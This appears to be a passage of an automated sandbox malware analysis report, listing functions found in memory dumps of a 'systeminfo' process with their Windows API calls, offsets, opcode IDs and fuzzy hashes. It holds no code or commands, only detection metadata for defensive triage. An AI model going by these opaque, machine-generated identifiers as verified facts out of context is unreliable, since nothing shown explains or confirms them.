                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                • Opcode ID: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction ID: 4dad25d23aaa2c4c57b155740328e32cb8e4d0711029d64f6f36f6ffc0125472
                                                                                                                                                                                • Opcode Fuzzy Hash: bbe50b243a5cf900cf766d7c061a869510e8dda4bbc257fabbaa2cebaee8741e
                                                                                                                                                                                • Instruction Fuzzy Hash: 12118671A106097FDA20EB58DC46FEF776CEFC5710F00850AF918A7241E771B5058BA6
                                                                                                                                                                                Function 005D92D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005D9307
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction ID: d39139a62b464d9ecf92f0c2c609c4ddca1fea58dbe7e45a5b19ce845f527779
                                                                                                                                                                                • Opcode Fuzzy Hash: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction Fuzzy Hash: DDE086362416057BC660EB59DC01FDB7B5CDFC5754F404415FA0CA7241DA71B90187F5
                                                                                                                                                                                Function 04724650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 1fdb42d096afccec53522e1959c1c23dfded99e7a37b4deb61f49567b83f0d69
                                                                                                                                                                                • Instruction ID: c95d6bc5003ccf3dc9451b9b0ccee0d43feb132e565e0d19a1b1def216d387ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 1fdb42d096afccec53522e1959c1c23dfded99e7a37b4deb61f49567b83f0d69
                                                                                                                                                                                • Instruction Fuzzy Hash: EC9002616015004261507158480440660559BE1306396C125B0959570D8628D955A26A
                                                                                                                                                                                Function 04724340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 6c065edcc8e94e5af1fdd2999dfd03e9e0fea92fd34e839dbf14f09129c307dc
                                                                                                                                                                                • Instruction ID: f3f5f23e17326962560cc4ebccf5d6f6d08847a60622b432e09720b33cf7c59e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c065edcc8e94e5af1fdd2999dfd03e9e0fea92fd34e839dbf14f09129c307dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 7590023160580012B1507158488454640559BE0306B56C021F0829574D8A24DA566362
                                                                                                                                                                                Function 04722C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fba952cf1ef8897673dc7bae150b0f4b79457f6619488a7bfd9a0fdde0de4d86
                                                                                                                                                                                • Instruction ID: 34bf4a382821d05606cb8a59afa503b7e03572e29a3de0cbb9ffe50796795e8c
                                                                                                                                                                                • Opcode Fuzzy Hash: fba952cf1ef8897673dc7bae150b0f4b79457f6619488a7bfd9a0fdde0de4d86
                                                                                                                                                                                • Instruction Fuzzy Hash: 4190023120148802F1207158840474A00558BD0306F5AC421B4829678E86A5D9917122
                                                                                                                                                                                Function 04722C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 049e8577b161d917ff77e606325efc3af8fab4e42ca1fbcffa71ae5407ebcc36
                                                                                                                                                                                • Instruction ID: a6ae9f90dad020644ef27be854cfd84283f8fd709e3523d7104980f0e8113261
                                                                                                                                                                                • Opcode Fuzzy Hash: 049e8577b161d917ff77e606325efc3af8fab4e42ca1fbcffa71ae5407ebcc36
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A90023120140842F11071584404B4600558BE0306F56C026B0529674E8625D9517522
                                                                                                                                                                                Function 04722CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: b9b87c1610ad105efd8a58b21f9383212fe64bbd6995dbabde2704e8012b2272
                                                                                                                                                                                • Instruction ID: c1359ceffc647fd3167cbe9026f5fee80f55f3a65c7dff7a4fbbed3fd4d534f2
                                                                                                                                                                                • Opcode Fuzzy Hash: b9b87c1610ad105efd8a58b21f9383212fe64bbd6995dbabde2704e8012b2272
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D90023120140402F1107598540864600558BE0306F56D021B5429575FC675D9917132
                                                                                                                                                                                Function 04722D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 51a5f42b0be175e2a5f784037a749c3440f9708c49c35ce3ef49548f0c8c7a88
                                                                                                                                                                                • Instruction ID: 0d3735f7d65dc6e98d03b9ad53c5aa630f461541cba4ea8af81d48d6765a7439
                                                                                                                                                                                • Opcode Fuzzy Hash: 51a5f42b0be175e2a5f784037a749c3440f9708c49c35ce3ef49548f0c8c7a88
                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022130140003F150715854186064055DBE1306F56D021F0819574DD925D9566223
                                                                                                                                                                                Function 04722D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: ed3b2391dcc1ae7788320b80176d11e5c3502f1b25e73043c7dcde47ae6f8e94
                                                                                                                                                                                • Instruction ID: 03bb82b87c4433e6ed0d8869350977665e8f0ed84834dff4d48aa8892c6ffb2f
                                                                                                                                                                                • Opcode Fuzzy Hash: ed3b2391dcc1ae7788320b80176d11e5c3502f1b25e73043c7dcde47ae6f8e94
                                                                                                                                                                                • Instruction Fuzzy Hash: DF90022921340002F1907158540860A00558BD1207F96D425B041A578DC925D9696322
                                                                                                                                                                                Function 04722DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 4ace801faa91847e8a3f048ff55d64815a74c04a0f3f92802f775f59c0591a98
                                                                                                                                                                                • Instruction ID: 7c1c3a4a4ac884ca421eec1f4bf7183bf54b443f140b06c0f743779f0a28b96b
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ace801faa91847e8a3f048ff55d64815a74c04a0f3f92802f775f59c0591a98
                                                                                                                                                                                • Instruction Fuzzy Hash: 8590023120140413F1217158450470700598BD0246F96C422B0829578E9666DA52B122
                                                                                                                                                                                Function 04722DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: b0fdd7c8a21d8796d63039a2f7f0a0d79f85f32c51964ecdec92ab586d3a817b
                                                                                                                                                                                • Instruction ID: 46995ee0c329768377aea27fe4b3eaad86b92b8df5df694d73b7c97103f89b41
                                                                                                                                                                                • Opcode Fuzzy Hash: b0fdd7c8a21d8796d63039a2f7f0a0d79f85f32c51964ecdec92ab586d3a817b
                                                                                                                                                                                • Instruction Fuzzy Hash: 48900221242441527555B158440450740569BE0246796C022B1819970D8536E956E622
                                                                                                                                                                                Function 04722EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: add8d04b47842d518b4b0f75c975e4907d7209a4692547e21ef31b7a1446c359
                                                                                                                                                                                • Instruction ID: b65dd6b3c3933a83ccedcdddbda67d75b2da2a7538cdb078ef62b89abfb7e43c
                                                                                                                                                                                • Opcode Fuzzy Hash: add8d04b47842d518b4b0f75c975e4907d7209a4692547e21ef31b7a1446c359
                                                                                                                                                                                • Instruction Fuzzy Hash: 0090026120180403F1507558480460700558BD0307F56C021B2469575F8A39DD517136
                                                                                                                                                                                Function 04722E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: e5409208e05562023b03b245a7b21908bb8213ce192dbe514d4aa3304928aebf
                                                                                                                                                                                • Instruction ID: 560e95ea533851c8420ff8042b274109402aaea3b0b38cc110af30f9a1fc75ae
                                                                                                                                                                                • Opcode Fuzzy Hash: e5409208e05562023b03b245a7b21908bb8213ce192dbe514d4aa3304928aebf
                                                                                                                                                                                • Instruction Fuzzy Hash: E690022160140502F11171584404616005A8BD0246F96C032B1429575FCA35DA92B132
                                                                                                                                                                                Function 04722F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 2d6c25f3fa9e0a24c3c6e999b905c7183ca107cd331cfeaa5153fbb4d6cb60f3
                                                                                                                                                                                • Instruction ID: 8f1fcb8b54b295aea5ac59329626c4ee7ec10cf664e686d33b53803ab9c28fd7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d6c25f3fa9e0a24c3c6e999b905c7183ca107cd331cfeaa5153fbb4d6cb60f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 0290026134140442F11071584414B060055CBE1306F56C025F1469574E8629DD527127
                                                                                                                                                                                Function 04722FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9ab1c907422812d33a404036767d3581568b7e6158934ee88c6ec8fd0536fb55
                                                                                                                                                                                • Instruction ID: e4a30cd91aa614708252c6e30e58c47c3672348d1ec310f6af0e2fd262157359
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab1c907422812d33a404036767d3581568b7e6158934ee88c6ec8fd0536fb55
                                                                                                                                                                                • Instruction Fuzzy Hash: C8900221211C0042F21075684C14B0700558BD0307F56C125B0559574DC925D9616522
                                                                                                                                                                                Function 04722FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 8f3128c105ffd7bc34be5d1c0b8514ff4e1c855fbf33675625d7ba58d58a42b5
                                                                                                                                                                                • Instruction ID: e97a98dc90d741261945bcd3cb86837ab14dbf3670d6d3aee048858411b0b349
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3128c105ffd7bc34be5d1c0b8514ff4e1c855fbf33675625d7ba58d58a42b5
                                                                                                                                                                                • Instruction Fuzzy Hash: C6900221601400426150716888449064055AFE1216756C131B0D9D570E8569D9656666
                                                                                                                                                                                Function 04722AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fce6d926650110a18ecdc3c156b61c9124579701614a86fe6712dc735a9c78e3
                                                                                                                                                                                • Instruction ID: fc06099f74b8e94836bd331746b81c3240a79e5f684d3be4dc2bde57463af4bd
                                                                                                                                                                                • Opcode Fuzzy Hash: fce6d926650110a18ecdc3c156b61c9124579701614a86fe6712dc735a9c78e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 71900225221400022155B558060450B04959BD6356396C025F181B5B0DC631D9656322
                                                                                                                                                                                Function 04722AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 3e4735cc1b52e6d9d7072366ede9717abe0b0bb6cb421dfaede143c978cb9617
                                                                                                                                                                                • Instruction ID: 5b33fe51a63141b2e15898eae111c271dddb6d8533e882d868d87af4a4c05561
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4735cc1b52e6d9d7072366ede9717abe0b0bb6cb421dfaede143c978cb9617
                                                                                                                                                                                • Instruction Fuzzy Hash: 57900225211400032115B558070450700968BD5356356C031F141A570DD631D9616122
                                                                                                                                                                                Function 04722B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9dc518f89a0563682df1835785808aa3132f2d0fc3bc7ee3f67203492aa15f19
                                                                                                                                                                                • Instruction ID: a13ea7d98a6772413a6a7a77ca45c80cf8f53ce78c808efdb067772a50213964
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dc518f89a0563682df1835785808aa3132f2d0fc3bc7ee3f67203492aa15f19
                                                                                                                                                                                • Instruction Fuzzy Hash: 8690026120240003611571584414616405A8BE0206B56C031F14195B0EC535D9917126
                                                                                                                                                                                Function 04722BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
